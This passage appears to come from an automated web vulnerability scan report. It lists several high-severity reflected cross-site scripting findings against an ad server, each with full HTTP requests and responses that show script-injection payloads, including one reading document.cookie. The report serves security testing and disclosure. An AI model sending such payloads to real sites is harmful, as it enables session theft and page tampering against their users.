Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:35 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc19edf"><script>alert(1)</script>eba141e2a02/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pag
...[SNIP]...

2.636. http://media.sensis.com.au/hserver/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bf3d"><script>alert(1)</script>3d0f9e4267c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random2bf3d"><script>alert(1)</script>3d0f9e4267c=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:36 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random2bf3d"><script>alert(1)</script>3d0f9e4267c=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=7463117
...[SNIP]...

2.637. http://media.sensis.com.au/hserver/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a29ed"><script>alert(1)</script>5dd6d620969 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?a29ed"><script>alert(1)</script>5dd6d620969=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:34 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 436
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?a29ed"><script>alert(1)</script>5dd6d620969=1" target="_new">
...[SNIP]...

2.638. http://media.sensis.com.au/hserver/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb6d"><script>alert(1)</script>6396bcaf30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver7cb6d"><script>alert(1)</script>6396bcaf30/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:55 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 468
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c00000000000000007cb6d"><script>alert(1)</script>6396bcaf30/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891/relocate=http://clk.redcated
...[SNIP]...

2.639. http://media.sensis.com.au/hserver/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80699"><script>alert(1)</script>ba4c6074a11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random80699"><script>alert(1)</script>ba4c6074a11=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:56 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 671
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00031a960000000000000000/acc_random80699"><script>alert(1)</script>ba4c6074a11=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891/relocate=http://bs.serving-sys.com/Burst
...[SNIP]...

2.640. http://media.sensis.com.au/hserver/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 315d5"><script>alert(1)</script>4c5bc8d6a28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891?315d5"><script>alert(1)</script>4c5bc8d6a28=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:53 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 480
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000308680000000000000000/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891?315d5"><script>alert(1)</script>4c5bc8d6a28=1&relocate=http://clk.redcated/OMA/go/255858459/direct/01/" target="_blank">
...[SNIP]...

2.641. http://media.sensis.com.au/hserver/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79515"><script>alert(1)</script>1b73da98abf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver79515"><script>alert(1)</script>1b73da98abf/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:41 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 503
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e0000000079515"><script>alert(1)</script>1b73da98abf/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT
...[SNIP]...

2.642. http://media.sensis.com.au/hserver/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af87a"><script>alert(1)</script>0ef098440cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomaf87a"><script>alert(1)</script>0ef098440cd=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:43 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 503
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e00000000/acc_randomaf87a"><script>alert(1)</script>0ef098440cd=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122
...[SNIP]...

2.643. http://media.sensis.com.au/hserver/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1716"><script>alert(1)</script>30cb0b28617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?d1716"><script>alert(1)</script>30cb0b28617=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:40 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 506
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e00000000/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?d1716"><script>alert(1)</script>30cb0b28617=1" target="_new">
...[SNIP]...

2.644. http://media.sensis.com.au/hserver/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e39e9"><script>alert(1)</script>8eb25010a64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hservere39e9"><script>alert(1)</script>8eb25010a64/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:42 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 507
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002179792cb881e00000000e39e9"><script>alert(1)</script>8eb25010a64/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT
...[SNIP]...

